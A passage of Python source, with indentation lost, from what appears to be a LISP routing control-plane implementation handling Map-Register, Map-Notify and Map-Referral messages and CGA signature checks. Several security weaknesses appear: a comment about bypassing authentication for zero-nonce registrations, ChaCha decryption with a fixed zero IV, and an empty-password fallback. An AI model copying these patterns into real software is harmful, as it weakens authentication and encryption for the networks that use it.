# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
# to all members (all RLOCs in the sg_rloc_set.
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = []
if (len(sg_rloc_set) != 0 and sg_rloc_set[0].rle != None):
rle_nodes = sg_rloc_set[0].rle.rle_nodes
#endif
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
# Map-Notify to the RTR instead the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
# No ITRs or RTRs fond.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None, if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if (json_sig.has_key("signature") == False): continue
return(rloc_record)
#endfor
return(None)
#enddef
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, hash_mask_len / 16):
addr = address & 0xffff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_id, pubkey, True/False]. Values can be of value None but last
# boolean argument is if the hash lookup was found.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if (json_pubkey.has_key("public-key") == False): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use signature-eid if in JSON string. Otherwise, Crypto-EID is signature-
# EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif (sig.has_key("signature-eid")):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
# Lookup CGA hash in mapping datbase to get public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
# a Go signer an a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the catentation of the xTR address and
# map-notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return a non encrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
# Parse first 4 bytes which is not encrypted. If packet is not encrypted,
# return to caller. If it is encrypted, get 3-bit key-id next to e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
plaintext = chacha.ChaCha(ekey, iv).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
# will either return a unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
# Allowing overlapping ams registered prefixes. Make sure we get the
# configured parent entry and not the registered more-specific. This
# registration could be a more-specific of the registered more-specific
# entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (site.auth_key.has_key(key_id)):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
# If merge being requested get individual site-eid. If not, and what
# was cached had merge bit set, set flag to issue error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = source.address + map_register.xtr_id
if (site_eid.individual_registrations.has_key(key)):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
site_eid.encrypt_json = parent.encrypt_json
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
# If TTL is 0, unregister entry if source of Map-Reqister is in the
# list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None, site_eid.encrypt_json)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (site.allowed_rlocs.has_key(addr_str) == False):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
# Send Map-Notify if the RLOC-set changed for thie site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
#endfor
#
# Send Map-Noitfy to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
# The merged Map-Notify will serve as a Map-Register ack. So don't need
# to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process as already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
allow, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (allow == False): continue
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
#
# Gleaned map-cache entries always override what is regitered in
# the mapping system. Since the mapping system RLE entries are RTRs
# and RTRs store gleaned mappings for group members.
#
if (mc.gleaned):
lprint("Ignore Map-Notify for gleaned {}".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False),
rloc.rle.print_rle(False, True)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
# Get map-server so we can do statistics and find auth-key, if a auth-key
# was provided in a Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
# Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify()
# starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
# in this site. There is probably a RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
#endof
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (site.auth_key.has_key(key_id)):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if arrived Map-Referral EID-prefix is more-specific than the
# last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
# Process each EID record in Map-Reply message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
# Check for Map-Referral looping. If there is no loop cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
